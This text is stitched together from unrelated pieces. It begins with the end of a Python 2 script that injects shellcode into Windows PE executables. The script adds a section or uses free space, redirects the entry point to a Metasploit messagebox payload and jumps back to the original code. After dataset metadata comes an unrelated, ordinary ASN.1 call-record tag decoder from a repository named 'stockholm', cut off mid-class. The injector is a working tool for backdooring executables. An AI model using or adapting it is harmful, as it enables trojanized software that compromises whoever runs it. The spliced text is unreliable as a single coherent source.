self.pe.sections[-1].PointerToRawData = 0x00000000
self.pe.sections[-1].PointerToRelocations = 0x00000000
self.pe.sections[-1].PointerToLinenumbers = 0x00000000
self.pe.sections[-1].NumberOfRelocations = 0x0000
self.pe.sections[-1].NumberOfLinenumbers = 0x0000
self.pe.sections[-1].Characteristics = 0x00000000
self.pe.sections.pop()
self.pe.FILE_HEADER.NumberOfSections -=1
self.__adjust_optional_header()
else:
raise SectionDoublePError("There's no section to pop.")
def push_back(self, Name=".NewSec", VirtualSize=0x00000000, VirtualAddress=0x00000000,
RawSize=0x00000000, RawAddress=0x00000000, RelocAddress=0x00000000,
Linenumbers=0x00000000, RelocationsNumber=0x0000, LinenumbersNumber=0x0000,
Characteristics=0xE00000E0, Data=""):
""" Adds the section, specified by the functions parameters, at the end of the section
table.
If the space to add an additional section header is insufficient, a buffer is inserted
after SizeOfHeaders. Data between the last section header and the end of SizeOfHeaders
is copied to +1 FileAlignment. Data directory entries pointing to this data are fixed.
A call with no parameters creates the same section header as LordPE does. But for the
binary to be executable without errors a VirtualSize > 0 has to be set.
If a RawSize > 0 is set or Data is given the data gets aligned to the FileAlignment and
is attached at the end of the file.
"""
if self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections):
FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
SectionAlignment = self.pe.OPTIONAL_HEADER.SectionAlignment
if len(Name) > 8:
raise SectionDoublePError("The name is too long for a section.")
if ( VirtualAddress < (self.pe.sections[-1].Misc_VirtualSize +
self.pe.sections[-1].VirtualAddress)
or VirtualAddress % SectionAlignment != 0):
if (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) != 0:
VirtualAddress = \
(self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize -
(self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) + SectionAlignment)
else:
VirtualAddress = \
(self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize)
if VirtualSize < len(Data):
VirtualSize = len(Data)
if (len(Data) % FileAlignment) != 0:
# Padding the data of the section.
Data += '\x00' * (FileAlignment - (len(Data) % FileAlignment))
if RawSize != len(Data):
if ( RawSize > len(Data)
and (RawSize % FileAlignment) == 0):
Data += '\x00' * (RawSize - (len(Data) % RawSize))
else:
RawSize = len(Data)
section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
# If the new section header exceeds the SizeOfHeaders there won't be enough space
# for an additional section header. Besides that it's checked if the 0x28 bytes
# (size of one section header) after the last current section header are filled
# with nulls/ are free to use.
if ( self.pe.OPTIONAL_HEADER.SizeOfHeaders <
section_table_offset + (self.pe.FILE_HEADER.NumberOfSections+1)*0x28
or not self.__is_null_data(self.pe.get_data(section_table_offset +
(self.pe.FILE_HEADER.NumberOfSections)*0x28, 0x28))):
# Checking if more space can be added.
if self.pe.OPTIONAL_HEADER.SizeOfHeaders < 0x1000:
self.__add_header_space()
print "Additional space to add a new section header was allocated."
else:
raise SectionDoublePError("No more space can be added for the section header.")
# The validity check of RawAddress is done after space for a new section header may
# have been added because if space had been added the PointerToRawData of the previous
# section would have changed.
if (RawAddress != (self.pe.sections[-1].PointerToRawData +
self.pe.sections[-1].SizeOfRawData)):
RawAddress = \
(self.pe.sections[-1].PointerToRawData + self.pe.sections[-1].SizeOfRawData)
# Appending the data of the new section to the file.
if len(Data) > 0:
self.pe.__data__ = self.pe.__data__[:] + Data
section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
# Manually writing the data of the section header to the file.
self.pe.set_bytes_at_offset(section_offset, Name)
self.pe.set_dword_at_offset(section_offset+0x08, VirtualSize)
self.pe.set_dword_at_offset(section_offset+0x0C, VirtualAddress)
self.pe.set_dword_at_offset(section_offset+0x10, RawSize)
self.pe.set_dword_at_offset(section_offset+0x14, RawAddress)
self.pe.set_dword_at_offset(section_offset+0x18, RelocAddress)
self.pe.set_dword_at_offset(section_offset+0x1C, Linenumbers)
self.pe.set_word_at_offset(section_offset+0x20, RelocationsNumber)
self.pe.set_word_at_offset(section_offset+0x22, LinenumbersNumber)
self.pe.set_dword_at_offset(section_offset+0x24, Characteristics)
self.pe.FILE_HEADER.NumberOfSections +=1
# Parsing the section table of the file again to add the new section to the sections
# list of pefile.
self.pe.parse_sections(section_table_offset)
self.__adjust_optional_header()
else:
raise SectionDoublePError("The NumberOfSections specified in the file header and the " +
"size of the sections list of pefile don't match.")
def print_section_info(pe):
for section in pe.sections:
print section
# If you don't have pydasm installed comment the rest of the function out.
print "The instructions at the beginning of the last section:"
ep = pe.sections[-1].VirtualAddress
ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase
data = pe.get_memory_mapped_image()[ep:ep+6]
offset = 0
while offset < len(data):
i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)
print pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
offset += i.length
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56\xff\x55" +
"\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52\xe8" +
"\x61\xff\xff\xff\x68\x21\x58\x20\x20\x68\x57\x30\x30\x74" +
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x65\x21\x58\x20\x68" +
"\x20\x48\x65\x72\x68\x20\x57\x61\x73\x68\x73\x69\x73\x78" +
"\x78\x78\x65\x62\x61\x31\xc9\x88\x4c\x24\x12\x89\xe1\x31" +
"\xd2\x52\x53\x51\x52\xff\xd0")
if __name__ == '__main__':
exe_file = raw_input('[*] Enter full path of the main executable :')
final_pe_file = raw_input('[*] Enter full path of the output executable :')
pe = PE(exe_file)
if (peutils.is_probably_packed(pe)):
print("[-] Packed binary .... nothing to be done yet")
exit()
OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
print("[+] original entry point (OEP): " + str(OEP))
pe_section = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
print("[+] getting section: " + str(pe_section))
align = pe.OPTIONAL_HEADER.SectionAlignment
what_left = (pe_section.VirtualAddress + pe_section.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
print("[+] Alignment: " + str(align) )
print("[+] Space where to inject: " +str(what_left) )
end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left
padd = align - (end_rva % align)
e_offset = pe.get_offset_from_rva(end_rva+padd) - 1
scode_size = len(sample_shell_code)+7 #+7 because i need to popad everything as was before !
print("[+] End of Virtual Address: " + str(end_rva))
print("[+] Padding: " + str(padd))
print("[+] Offset: " + str(e_offset))
if padd < scode_size:
# Enough space is not available for shellcode
#TODO: using Library to Add new Section
print("[-] Not enough space into executable for injecting. You need to add a new section.. it's still in todo list")
sections = SectionDoubleP(pe)
print("[+] Adding new Section")
try:
jmp_to = OEP #FIXME: this is wrong.. we need the right offset !
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
sections.push_back(Characteristics=0x60000020, Data=sample_shell_code)
print("[+] Printing all sections !")
print_section_info(pe)
pe.write(filename=final_pe_file)
except SectionDoublePError as e:
print("[-] Error: " + e)
exit()
print("[+] Injecting code into section !")
# Code can be injected
scode_end_off = e_offset
scode_start_off = scode_end_off - scode_size
pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
print("[+] New Entry Point: " + str(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
raw_pe_data = pe.write()
jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
print("[+] Dynamic Rebase Calculation ..")
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
print("[+] ShellCode Injected:")
print("==========================================")
print(sample_shell_code)
print("==========================================")
final_data = list(raw_pe_data)
final_data[scode_start_off:scode_start_off+len(sample_shell_code)] = sample_shell_code
final_data = ''.join(final_data)
raw_pe_data = final_data
pe.close()
new_file = open(final_pe_file, 'wb')
new_file.write(raw_pe_data)
new_file.close()
print '[*] Job Done! :)'
|
UTF-8
|
Python
| false | false | 2,014 |
8,469,675,510,089 |
681984d3f48e7c4a624c7bcc7995e4499a574c0f
|
3efa6e7c1959ed0e1442e3c0377bba2234c452e5
|
/stockholm/cdr/modules/custom_tags.py
|
a83cfde36d1f2d27f7fa56bd84f013ca85bc5784
|
[] |
no_license
|
SirBigData/stockholm
|
https://github.com/SirBigData/stockholm
|
b812e35bf9e3ee8522a74314a6a35bbab3ed254b
|
4c4176a45b79b9f4014226942e6c0ccd45aa4ad2
|
refs/heads/master
| 2020-12-25T06:08:04.156174 | 2014-08-01T12:32:58 | 2014-08-01T12:32:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from stockholm.asn1.ber_decoder import Tag
def get_tbcd_string(byte_string):
result = []
for dec in [ord(x) for x in byte_string]:
result.append(str(dec & 0xf))
second_digit = (dec & 0xf0) >> 4
if second_digit ^ 0xf:
result.append(str(second_digit))
return "".join(result)
def get_octet_string(byte_string, fill_zeros=0):
return "".join(map(lambda x: str(ord(x)).zfill(fill_zeros), byte_string))
def get_hex_string(byte_string):
return "".join(map(lambda x: x.encode('hex'), byte_string))
def get_ascii(byte_string):
return byte_string.encode('ascii')
def get_int(byte_string):
return int(byte_string.encode('hex'), 16)
## Custom Tags
class AccountCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "accountCode"
super(AccountCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class AddressString(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(AddressString, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class AddressStringExtended(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(AddressStringExtended, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class AgeOfLocationEstimate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "ageOfLocationEstimate"
super(AgeOfLocationEstimate, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class AirInterfaceUserRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(AirInterfaceUserRate, self).__init__(header, byte_string, load_value, name)
class AoCCurrencyAmountSent(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "aoCCurrencyAmountSentToUser"
super(AoCCurrencyAmountSent, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ApplicationIdentifier(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ApplicationIdentifier, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class AsyncSyncIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(AsyncSyncIndicator, self).__init__(header, byte_string, load_value, name)
class BearerServiceCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "bearerServiceCode"
super(BearerServiceCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string,)
class BitRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(BitRate, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class BSSMAPCauseCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "bSSMAPCauseCode"
super(BSSMAPCauseCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CallAttemptState(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "callAttemptState"
super(CallAttemptState, self).__init__(header, byte_string, load_value, name)
class CallIDNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "callIdentificationNumber"
super(CallIDNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class CAMELTDPData(Tag): # TODO ojo es una secuencia
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(CAMELTDPData, self).__init__(header, byte_string, load_value, name)
class CarrierIdentificationCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "carrierIdentificationCode"
super(CarrierIdentificationCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class CarrierInfo(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(CarrierInfo, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CarrierInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "carrierInformation"
super(CarrierInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CarrierSelectionSubstitutionInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "carrierSelectionSubstitutionInformation"
super(CarrierSelectionSubstitutionInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CauseCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "causeCode"
super(CauseCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChangeInitiatingParty(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "changeInitiatingParty"
super(ChangeInitiatingParty, self).__init__(header, byte_string, load_value, name)
class CallPosition(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "callPosition"
super(CallPosition, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class ChannelAllocationPriorityLevel(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "channelAllocationPriorityLevel"
super(ChannelAllocationPriorityLevel, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChannelCodings(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ChannelCodings, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargeAreaCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ChargeAreaCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargedParty(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "chargedParty"
super(ChargedParty, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class ChargeInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "chargeInformation"
super(ChargeInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargingCase(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "chargingCase"
super(ChargingCase, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargingIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ChargingIndicator, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargingOrigin(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "originForCharging"
super(ChargingOrigin, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ChargingUnitsAddition(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "chargingUnitsAddition"
super(ChargingUnitsAddition, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class Counter(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Counter, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CRIIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "cRIIndicator"
super(CRIIndicator, self).__init__(header, byte_string, load_value, name)
class CRIToMS(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "cRIToMS"
super(CRIToMS, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class CUGIndex(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "cUGIndex"
super(CUGIndex, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class CUGInterlockCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "cUGInterlockCode"
super(CUGInterlockCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class C7CHTMessage(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(C7CHTMessage, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class C7ChargingMessage(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "c7ChargingMessage"
super(C7ChargingMessage, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class Date(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Date, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string, 2)
class DecipheringKeys(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "decipheringKeys"
super(DecipheringKeys, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class DefaultCallHandling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "defaultCallHandling"
super(DefaultCallHandling, self).__init__(header, byte_string, load_value, name)
class DefaultSMS_Handling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "defaultSMSHandling"
super(DefaultSMS_Handling, self).__init__(header, byte_string, load_value, name)
class DeliveryOfErroneousSDU(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(DeliveryOfErroneousSDU, self).__init__(header, byte_string, load_value, name)
class DisconnectingParty(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "disconnectingParty"
super(DisconnectingParty, self).__init__(header, byte_string, load_value, name)
class Distributed(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Distributed, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class EMLPPPriorityLevel(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "eMLPPPriorityLevel"
super(EMLPPPriorityLevel, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class EndToEndAccessDataMap(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "endToEndAccessDataMap"
super(EndToEndAccessDataMap, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class EosInfo(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "eosInfo"
super(EosInfo, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ErrorRatio(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ErrorRatio, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class EventCRIToMS(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "eventCRIToMS"
super(EventCRIToMS, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class ExchangeIdentity(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "exchangeIdentity"
super(ExchangeIdentity, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_ascii(byte_string)
class FaultCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "faultCode"
super(FaultCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class FirstRadioChannelUsed(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "firstRadioChannelUsed"
super(FirstRadioChannelUsed, self).__init__(header, byte_string, load_value, name)
class FixedNetworkUserRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(FixedNetworkUserRate, self).__init__(header, byte_string, load_value, name)
class FreeFormatData(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "freeFormatData"
super(FreeFormatData, self).__init__(header, byte_string, load_value, name)
class FrequencyBandSupported(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "frequencyBandSupported"
super(FrequencyBandSupported, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class GenericDigitsSet(Tag): # TODO Ojo ver
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(GenericDigitsSet, self).__init__(header, byte_string, load_value, name)
class GenericNumbersSet(Tag): # TODO Ojo ver
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(GenericNumbersSet, self).__init__(header, byte_string, load_value, name)
class GlobalCallReference(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "globalCallReference"
super(GlobalCallReference, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class GlobalTitle(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(GlobalTitle, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class GlobalTitleAndSubSystemNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(GlobalTitleAndSubSystemNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class GSMCallReferenceNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "gSMCallReferenceNumber"
super(GSMCallReferenceNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class IMEI(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(IMEI, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class IMEISV(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(IMEISV, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class IMSI(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(IMSI, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class INMarkingOfMS(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "iNMarkingOfMS"
super(INMarkingOfMS, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class INServiceTrigger(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "iNServiceTrigger"
super(INServiceTrigger, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class IntermediateRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "intermediateRate"
super(IntermediateRate, self).__init__(header, byte_string, load_value, name)
class InternalCauseAndLoc(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "internalCauseAndLoc"
super(InternalCauseAndLoc, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class IuCodec(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "iuCodec"
super(IuCodec, self).__init__(header, byte_string, load_value, name)
class LCSAccuracy(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(LCSAccuracy, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LCSClientType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "lCSClientType"
super(LCSClientType, self).__init__(header, byte_string, load_value, name)
class LCSDeferredEventType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "lCSDeferredEventType"
super(LCSDeferredEventType, self).__init__(header, byte_string, load_value, name)
class LegID(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(LegID, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LevelOfCAMELService(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "levelOfCAMELService"
super(LevelOfCAMELService, self).__init__(header, byte_string, load_value, name)
class LocationCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "locationCode"
super(LocationCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LocationEstimate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "locationEstimate"
super(LocationEstimate, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LocationInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(LocationInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class MessageReference(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "messageReference"
super(MessageReference, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MessageTypeIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "messageTypeIndicator"
super(MessageTypeIndicator, self).__init__(header, byte_string, load_value, name)
class MiscellaneousInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "miscellaneousInformation"
super(MiscellaneousInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MobileUserClass1(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "mobileUserClass1"
super(MobileUserClass1, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MobileUserClass2(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "mobileUserClass2"
super(MobileUserClass2, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MultimediaInformation(Tag): # TODO ojo es una secuencia
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "multimediaInformation"
super(MultimediaInformation, self).__init__(header, byte_string, load_value, name)
class NetworkCallReference(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "networkCallReference"
super(NetworkCallReference, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class NumberOfChannels(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(NumberOfChannels, self).__init__(header, byte_string, load_value, name)
class NumberOfMeterPulses(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfMeterPulses"
super(NumberOfMeterPulses, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class NumberOfOperations(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfOperations"
super(NumberOfOperations, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class NumberOfShortMessage(Tag):
